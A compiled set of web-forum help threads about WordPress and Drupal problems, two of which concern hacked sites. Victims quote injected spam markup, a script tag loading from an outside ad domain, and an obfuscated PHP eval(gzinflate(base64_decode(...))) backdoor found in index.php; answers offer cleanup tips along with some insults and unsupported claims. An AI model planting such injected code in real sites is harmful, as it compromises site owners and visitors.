How to locate the malicious code in my Wordpress site - wordpress

Only today that it came to my attention that there is a malicious link that was injected in my wordpress site.
The link is only on the homepage of orphicpixel.com and here is the full code in html
<div class="toggle-search"><div id="5221f63">Learn how to extend your penis size using vigrx reviews.</div><script type="text/javascript">document.getElementById("36f1225".split("").reverse().join("")).style.display
= "none"</script><i class="fa fa-search"></i></div>
This are the fix that I tried.
Change the theme to default - the code is still there.
Turn off all the plugins - the code is gone.
I have identified 5 plugins that when turned on, the code appears. But the plugins are the official plugins like Jetpack, WP-pagination etc.
I search already my database but I got nothing.
I downloaded the theme files and search the codes, nothing
I downloaded all the plugins file and search the codes, nothing
So my last resort is to post this question here.

Unfortunately it is likely hidden in something like an eval statement, which can be hidden in hex. Wordpress can be useful but the plugins are what make a security nightmare. It is likely that some plugin has allowed some kind of upload access to your site and they can run their own PHP script or anything really.
Look through your files using
find . -type f -mtime -1
The -1 is days back, you can try -2, -3 etc. If this is a recent problem hopefully this will show a recently modified file. It will look a lot like gibberish when you open a file that is bad.
Again unfortunately, if they are smart they will adjust the time on the file to be something a few weeks back or what ever, thus making the file much harder to find.

Did you purchase your WordPress theme yourself and from the original provider? I would download Theme Authenticity Checker and run the plugin -- it finds malicious code within the theme. I know you checked the theme files, but better be safe than sorry. Usually, purchased themes have no problem but downloaded ones often have malicious code such as this.

Related

Prevent Search Engines from Indexing WordPress Blog

that might seems like an easy question but I'm struggling on this problem since monday.
There's a wordpress website that I need to be hidden when searching for the keywords contained in it, but I can't work it out.
I already tryied to:
Add a robots.txt, on the main root, on the httdocs folder, and on the folder containing the website.
Use the in-built function of wordpress.
Protect the website with a password
None of them seems to be working, so I deleted the website (that was a staging website btw) but it keeps being indexed on search engines.
What shall I do?
Robots.txt is the solution. However you need to realize it can take weeks for google remove the site from index.
For other options see "Make removal permanent" part - https://support.google.com/webmasters/answer/1663419?hl=en

Wordpress uses backed-up theme files instead of customized file. (solved by myself // little how-to)

I just wrote a long and detailed question and when I was about to submit it, I fixed the problem by myself. The problem did cost me about 5 hours and now I will just post this little explanation, so maybe it helps others and they will not feel as stupid as I do right now.
In my defense: I do not have that much experience with this system.
What was the Problem? When did it show up?
Before I change a file on the server, I always duplicate it and change the file name to originalFileName_yyyymmdd_hhmm.php (filename + date + time). I want to keep track of the changes, and when we launch the website, I wanted to do a local backup and then delete them from the server.
Let's say, in the folder of the active theme there is a file called home.php.
It is a template file, which means that you can select it as a template for a page when editing it in the backend of WordPress.
I duplicated it and called the new file home_20180301_2300.php.
Then I edited the home.php, but the changes were not displayed on the website.
I checked for any known cache issue, but that was not the problem. So I installed a debugging plugin (Template Debugger) to see which files are used by the server to create the website.
Wordpress used the home_20180301_2300.php instead of the home.php and I did not know why. When I deleted home_20180301_2300.php WordPress did NOT use home.php It just took the standard template instead.
What I think what happened
In the last moment before submitting this question I realized what happened:
In the process of working, there was a situation where I deleted the home.php and then edited the page in the backend. WordPress could not find the home.php, which was set as the template for this page. BUT it found home_20180301_2300.php and used it. (Because WordPress is smart [sometimes {not a joke}]). When home.php was back in its place, WordPress did not care. It looks like as long as there is no problem, WordPress does not search for other (or newer, or better suiting) files. It still used home_20180301_2300.php, because it worked. That's why my changes in home.php did not have any effect. home.php was ignored.
The Solution
I had to delete home_20180301_2300.php, open the page in edit mode and select home.php as the template again. WordPress did not find home_20180301_2300.php, "BUT HEY! There is home.php, my old friend, so I can use it", WordPress said and they happily lived together for the rest of their time.
Feel free to comment!
I am sure my explanation is quite simple and not showing the whole picture. If anyone knows better, I would be glad to hear it. Better knowledge of the problem and the way WordPress works can help me and others to better understand future issues.
Peace out,
Nils

WordPress' Tribe Events leads to main page

My client is using Tribe Events for, well, managing his events :) I was asked to make a new theme for him. I downloaded his old installation and created new theme, checked and everything was great. I uploaded the whole thing to my server - works as well. But when I finally got the thing on my client's host, every link leading to Tribe Events' content is leading back to main page. Strange thing - it happens only when my theme is on. But then again, I tried removing tribe-events directory from the theme, renaming it etc. Nothing helps. Any ideas?
You didn't provide details about the way you use it so I am not sure the way to provide exact reply.
If you use it without default page template (plugin one) then you should check your loop.
Did you override any files or did you change plugin files at all.
Make sure there is no extra loop running and if you use lops on page make sure you finish it properly
And finally - try to reset permalings, both theme and plugin, if any

A link to a linkstoads.net in my wordpress blog, probably a virus. How do i get rid of it?

Recently (last 2 weeks) this line of code appeared in the footer of a wordpress blog :
<script type="text/javascript" src="http://linkstoads.net/keller/link.php?id=3" name="linkstats"></script>
I did not put that here. I have no idea about what it does ; but I want it out.
For my first try, I just replaced the template and it was gone for a few minutes. But it came back.
So i got to my index.php file (not the template, the very first index.php) and found that code :
#c3284d#
eval(gzinflate(base64_decode("JcxLDoMwDEXROVL3EHkBeMCsfLqRTKxgKYE0WLFVtbsvkOnRe5dDPBxMGmoSc/YTnj0Yfw03+lBjD05rOD2ayRMxp7KrHbRqX9hw55y53tpLlFda5+G8FHpfrTYmUw/LhC24wPjo/g==")));
#/c3284d#
So I removed it, but it came back again the next day.
How is that possible ? I'm a newbie about viruses and security, so the answer may be really basic.
Congratulations! You have been hacked! Most likely you haven't haven't updated your software in quite some time and multiple hackers have exploited some well known vulnerability in your software.
How do you fix it? Scorched earth... You have been hacked by many bots, and probably sold online like some kind of whore. Delete your entire web root and start from scratch. Make sure you have the latest versions of every plugin and Wordpress.
For the record Wordpress was written by monkeys or children or children monkeys... Regardless it is by far one of the worst application I have ever hacked. They are probably still using your password hash as the session id, which means they don't even understand the basics of why you should hash passwords.
Oah if you keep getting hacked, higher a professional.
Problem solved, wordpress is not responsible for it.
There's a trojan that infect filezilla and when you open it, it'll inject code in every pages it can reach via filezilla.
This is really a big deal and 3 antiviruses could not even find it.
If you see that, format your computer.

Drupal 7 Comment Not Posting

I'm having a heck of time trying to get comments to post to my nodes. I've done all the obvious:
Enable comment module,
set appropriate permissions,
etc.
But every time I try to enter a comment it simply redirects to a "Add new comment" page and nothing gets posted. There is no comment in the Content -> Comments section and my database comment table is empty.
The only thing I can find relating to the issue is an error report in my log messages which displays a warning "page not found." I'm using the Drupal Busy theme.
Type: Page not found
Location: http://mysite/public://color/busy-0970ccd8/style.css?m
Message: public://color/busy-0970ccd8/style.css
Severity: Warning
I've ran the schema module and nothing is funky in with my database. Any thoughts on this? Much appreciated.
It's looking for a stylesheet from the Color module. It would normally be at sites/default/files/color/busy-0970ccd8/style.css
Do you have a sites/default/files directory? Check that you have one at that the directory is writable. Also check to be sure that the color module is enabled. Save your theme settings and clear your cache in configuration -- performance.
I'm not sure if a problem retrieving a style sheet from the color module could be causing this. Seems very unlikely.
You might consider not using the busy theme. It's current status is "minimally maintained" and the theme authors have left a note on the project page that there will be no further development at this time.
I recommend looking for a theme that is actively maintained and has good support. It looks like Busy is a pretty standard 960 grid, you might like Omega.

Resources